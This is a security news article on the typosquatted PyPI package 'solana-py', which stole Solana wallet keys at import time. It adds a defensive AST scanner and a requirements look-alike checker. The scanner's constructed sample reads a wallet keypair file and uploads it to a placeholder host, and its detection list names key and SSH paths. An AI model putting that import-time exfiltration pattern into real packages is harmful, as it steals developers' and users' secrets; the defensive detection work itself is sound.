Author: Bilal Hassan. Topics: News, Security & Ransomware
Cybersecurity researchers have uncovered a malicious package on the Python Package Index (PyPI) that was disguised as a legitimate Solana blockchain library. Instead of performing its claimed function, the package was designed to steal private keys from users’ cryptocurrency wallets.
The actual Solana Python API project on GitHub is called “solana-py”, but it is named “solana” on PyPI. A threat actor took advantage of this small difference and uploaded a malicious package called ‘solana-py’ to the PyPI repository with the intention of passing it off as the genuine Solana package.
The malicious “solana-py” package was downloaded 1,122 times before it was pulled from PyPI. It was published in versions 0.34.3, 0.34.4, and 0.34.5, tracking closely the latest official ‘solana’ release, 0.34.3. This close versioning was a deliberate strategy to mislead users searching for the right package to install.
The fake package included most of the authentic code from the Solana library but carried one fatal change. The attacker planted malicious code in the package’s “__init__.py” file, which runs as soon as the package is imported, and its purpose was to harvest Solana blockchain wallet keys from anyone who used the package.
The stolen information was then forwarded to an attacker-controlled domain on Hugging Face Spaces, “treeprime-gen.hf[.]space”. This is a common pattern: cybercriminals route stolen data through legitimate, trusted services so that the exfiltration traffic blends in with normal activity.
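The passage above describes the two traits that made the package dangerous: code that executes at import time (inside `__init__.py`) and an outbound connection to a hosting service. Those traits are visible statically. The scanner below is an added example, not code from the article or from Sonatype; it parses a package’s `__init__.py` with Python’s `ast` module and flags network-module imports, network calls made at module scope (which run on `import`), and string constants that hint at wallet or credential material. The module lists and hint substrings are assumed heuristics, and both sample `__init__.py` bodies are constructed for the example; the suspicious one only imitates the shape of an import-time stealer and is not the real package’s code.

```python
import ast
from dataclasses import dataclass

# Modules whose presence in a package's __init__.py deserves a second look:
# a blockchain client has no reason to open sockets while being imported.
# (Assumed heuristic list.)
NETWORK_ROOTS = {"socket", "urllib", "requests", "http", "httpx", "aiohttp"}
# Substrings that hint at wallet or credential material (assumed heuristic list).
SENSITIVE_HINTS = ("keypair", "id.json", "private_key", "secret_key", "mnemonic", ".ssh")


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str
    detail: str


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain such as urllib.request.urlopen, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class ImportTimeScanner(ast.NodeVisitor):
    """Flags code that executes on import, plus strings that point at secrets."""

    def __init__(self):
        self.findings = []
        self.func_depth = 0  # 0 means the statement runs when the module is imported

    def visit_FunctionDef(self, node):
        # Function bodies only run when called. Class bodies DO run at import time,
        # so ClassDef is deliberately left to generic_visit at the same depth.
        self.func_depth += 1
        self.generic_visit(node)
        self.func_depth -= 1

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Import(self, node):
        for alias in node.names:
            if alias.name.split(".")[0] in NETWORK_ROOTS:
                self.findings.append(Finding(node.lineno, "network_import", alias.name))

    def visit_ImportFrom(self, node):
        # level == 0 excludes relative imports such as "from .client import Client"
        if node.module and node.level == 0 and node.module.split(".")[0] in NETWORK_ROOTS:
            self.findings.append(Finding(node.lineno, "network_import", node.module))

    def visit_Call(self, node):
        name = _dotted_name(node.func)
        if self.func_depth == 0 and name and name.split(".")[0] in NETWORK_ROOTS:
            self.findings.append(Finding(node.lineno, "network_call_at_import", name))
        self.generic_visit(node)  # keep walking into arguments for nested constants/calls

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            lowered = node.value.lower()
            if any(hint in lowered for hint in SENSITIVE_HINTS):
                self.findings.append(Finding(node.lineno, "sensitive_string", node.value))


def scan_init_source(source: str) -> list:
    """Scan the text of an __init__.py and return findings ordered by line."""
    scanner = ImportTimeScanner()
    scanner.visit(ast.parse(source))
    return sorted(scanner.findings, key=lambda f: f.line)


def finding_kinds(source: str) -> set:
    return {f.kind for f in scan_init_source(source)}


# Constructed sample: what a clean client package's __init__.py typically looks like.
BENIGN_INIT = '''"""Constructed benign package."""
from .client import Client
__all__ = ["Client"]
__version__ = "0.1.0"
'''

# Constructed sample imitating the SHAPE of an import-time stealer (not real malware):
# a module-level network call whose payload comes from a wallet-looking path.
SUSPICIOUS_INIT = '''"""Constructed suspicious package."""
import os
import urllib.request
from .client import Client

def _collect():
    path = os.path.expanduser("~/.config/wallet/keypair.json")
    with open(path, "rb") as fh:
        return fh.read()

urllib.request.urlopen("https://example.invalid/upload", data=_collect())
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_INIT), ("suspicious", SUSPICIOUS_INIT)):
        print(label, [(f.line, f.kind, f.detail) for f in scan_init_source(src)])
```

Run this over the unpacked wheel or sdist of a dependency before it is installed, not after: the point is that the code in question runs on `import`, so installing it to inspect it is already too late.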
Sonatype Warns of Dangerous PyPI Library Risks
This incident highlights critical weaknesses in the software supply chain. Sonatype, the cybersecurity firm that discovered the threat, noted that legitimate libraries such as “solders” referred to “solana-py” in their PyPI project descriptions, which could lead developers to install the malicious package without realizing it.
Sonatype’s Ax Sharma reported that anyone who uses the real ‘solders’ package on PyPI may accidentally install the typosquatting ‘solana-py’ and introduce a crypto stealer into their application. This endangers not only the developer’s own secrets but also the data of any user running the compromised software.
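Both the version-number trick described earlier and the ‘solders’ description mix-up above come down to the same failure: a dependency was named by a string that looked right rather than checked against the name the project actually intended. The check below is an added example (not the article’s or Sonatype’s code) that reads `requirements.txt` lines, normalises names the way PyPI does (case-insensitive, runs of `-`, `_`, `.` collapsed to `-`), and compares each one against an allowlist of approved PyPI names. A name that is not approved but collapses to an approved one after stripping decorator tokens such as `py` or `python`, or that is otherwise very similar, is reported as a look-alike; approved names without an exact `==` pin are reported as unpinned. The allowlist, the decorator-token list, the similarity threshold and the sample requirements file are all constructed assumptions for the example; note that the allowlist holds PyPI names (`solana`), not GitHub repository names (`solana-py`), which is exactly the distinction the attacker exploited.

```python
import re
from difflib import SequenceMatcher

# Constructed allowlist: the PyPI distribution names this project may depend on.
# These are PyPI names, not GitHub repository names.
APPROVED = {"solana", "solders", "requests"}
# Tokens often bolted onto a real name to manufacture a look-alike (assumed list).
DECORATORS = {"py", "python", "lib", "official", "dev"}
# Similarity above which a non-approved name is treated as a look-alike (assumed).
LOOKALIKE_RATIO = 0.85


def normalize(name: str) -> str:
    """PEP 503 normalisation: lowercase, runs of '-', '_' or '.' become one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def strip_decorators(norm: str) -> str:
    """Drop decorator tokens so 'solana-py' and 'python-solana' both reduce to 'solana'."""
    core = [part for part in norm.split("-") if part not in DECORATORS]
    return "-".join(core) or norm


def parse_requirement(line: str):
    """Return (name, specifier) for one requirements.txt line, or None for blank/comment."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    match = re.match(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*(.*)$", line)
    return (match.group(1), match.group(2).strip()) if match else None


def check_requirements(text: str, approved=APPROVED) -> list:
    """Return (line_number, kind, detail) tuples; kinds: lookalike, unapproved, unpinned."""
    findings = []
    approved_norm = {normalize(a) for a in approved}
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_requirement(raw)
        if parsed is None:
            continue
        name, spec = parsed
        norm = normalize(name)
        if norm in approved_norm:
            if not spec.startswith("=="):
                findings.append((lineno, "unpinned", name))
            continue
        if not approved_norm:
            findings.append((lineno, "unapproved", name))
            continue
        core = strip_decorators(norm)

        def similarity(candidate):
            return SequenceMatcher(None, core, strip_decorators(candidate)).ratio()

        best = max(approved_norm, key=similarity)
        if core == strip_decorators(best) or similarity(best) >= LOOKALIKE_RATIO:
            findings.append((lineno, "lookalike", f"{name} resembles approved '{best}'"))
        else:
            findings.append((lineno, "unapproved", name))
    return findings


# Constructed sample requirements file; line 2 is the look-alike from the article.
SAMPLE_REQUIREMENTS = "\n".join([
    "solana==0.34.3",
    "solana-py==0.34.5   # constructed: GitHub-style name, not the PyPI package",
    "solders==0.21.0",
    "# a comment line is ignored",
    "requests",
    "numpy==1.26.4",
])

if __name__ == "__main__":
    for lineno, kind, detail in check_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {lineno}: {kind}: {detail}")
```

Wiring this into CI as a required step turns the “check the name carefully” advice into something enforced on every pull request; pairing it with `--require-hashes` in pip keeps a later upload of the same name and version from slipping past the pin.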
Ultimately, this event shows that one has to be very careful when downloading software packages. Developers must always verify that the libraries they use are authentic, and they should also carry out security checks from time to time to identify possible threats. Staying aware of newly emerging cybersecurity threats and limiting unnecessary dependence on third-party packages helps prevent similar attacks in the future.